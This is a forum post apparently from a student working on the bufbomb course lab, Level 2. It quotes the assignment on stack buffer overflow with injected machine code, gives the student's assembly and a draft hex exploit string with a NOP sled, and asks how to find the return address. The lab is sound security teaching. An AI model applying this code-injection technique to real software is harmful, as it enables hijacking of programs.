A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code. Within the file bufbomb there is a function bang having the following C code:
int global_value = 0;
void bang(int val)
{
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
Select all
Open in new window
Similar to Level 0 and 1, your task is to get bufbomb to execute the code for bang rather than returning to test Before this, however, you must set global variable global_value to your teams cookie. Your exploit code should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang.
Some Advice:
You can use GDB to get the information you need to construct your exploit string. Set a breakpoint within getbuf and run to this breakpoint. Determine parameters such as the address of global_value and the location of the buffer.
Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with GCC and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt.
Keep in mind that your exploit string depends on your machine, your compiler, and even your teams cookie. Do all of your work on a CSUG machine, and make sure you include the proper team name on the command line tobufbomb.
Watch your use of address modes when writing assembly code. Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004 into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!
Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions uses PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use theret instruction.
I already figured out that the exploit code that should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang is:
movl $0x48e6b07d, 0x804e158
push $0x08049414
ret
which when I encode it, I get:
I also know that the size of my buffer is 0x28 in hexadecimal so 40 in decimal. However, I don't know how to get the return address for the exploit code and I was wondering if you could help me. Also, for the text file that I will submitting, if I am understanding correctly it should be 40 characters long plus the exploit code return address, so it should be like this? 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 c7
04 25 58 e1 04 08 7d b0
e6 48 68 14 94 04 08 c3
00 00 00 00 30 30 30 30
where 30 30 30 30 is the return address for the exploit code that I am having trouble finding?